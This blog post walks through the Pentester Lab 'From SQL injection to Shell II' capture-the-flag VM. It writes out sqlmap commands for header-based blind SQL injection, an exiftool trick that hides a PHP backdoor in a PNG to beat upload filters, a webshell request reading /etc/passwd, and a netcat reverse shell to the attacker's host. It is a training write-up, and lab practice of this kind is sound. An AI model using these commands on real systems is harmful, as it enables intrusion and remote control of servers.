Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)
Hello friends!! Today we are going to solve another CTF challenge “From SQL injection to Shell II” and you can read part 1 from here. This VM is developed by Pentester Lab. You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/
Install the iso image in VM ware and start it. The task given in this lab is to gain access to administration console and upload PHP webshell.
Level: Intermediate
Penetrating Methodologies
- Network Scanning (Nmap)
- Vulnerable to Blind Time-Base SQL Injection
- Exploiting SQL Injection (SQLMAP)
- Hiding web shell inside Image (ExifTool)
- Uploading Web shell
- Spawning Shell (Netcat)
Walkthrough
The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.
nmap -A 192.168.1.102
Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on the test.
The given URL: http://192.168.1.102/cat.php?id=1 will run SQL query for ID 1 now let try to find out whether the above URL is vulnerable to SQL injection or not by adding(‘) apostrophe at last of URL:
Unfortunately, this page is not vulnerable to error based SQL injection as the author already mentioned here you will learn “Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell”
Then I had used acunetix to scan the target which has declared the level of threat is high for blind SQL injection.
Hence it is clear that exploit the target through SQL injection.
And after little more research work, I found the way to exploit it using sqlmap.
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” --dbs --dump-all --batch
If you remembered the title of the web page was “An Awesome Photoblog” hence name of the database must be a photoblog.
Now let’s fetch entire data under photoblog database through the following command:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” -D photoblog --dump-all --batch
Now try to use above credential to access administration console, again open target IP: 192.168.1.102 in the browser and click on login tab and type login as admin and password as P4ssw0rd.
Congrats!!! The first task is completed.
Now the last task is to upload PHP webshell. Under administration console, you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload an image.
I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.
Then I use ExifTool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image “1.png” and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.
Now type command for ExifTool to hide malicious code of php file inside the png image.
cd Desktop exiftool "-comment<= simple-backdoor.php" 1.png exiftool 1.png
As you can observe, the malicious code is hidden inside the image.
Now I had browse 1.png to add it as a new image which is our php webshell.
Our malicious file successfully uploaded on the web server. You can see a new row is added as webshell php which contains our php backdoor, now click on the backdoor.
Yuppie we have uploaded the image with hidden backdoor inside, now try to execute it.
After inspecting its source code we found link uploaded image, now let’s try to open it.
As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/password
And you can observe, we have successfully pulled the passwd file successfully, hence now can spawn victim’s shell through it.
Let’s run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.
nc -lvp 6666 http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/sh
Superb!!! We completed our last challenge also here we have spawned victim web shell.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here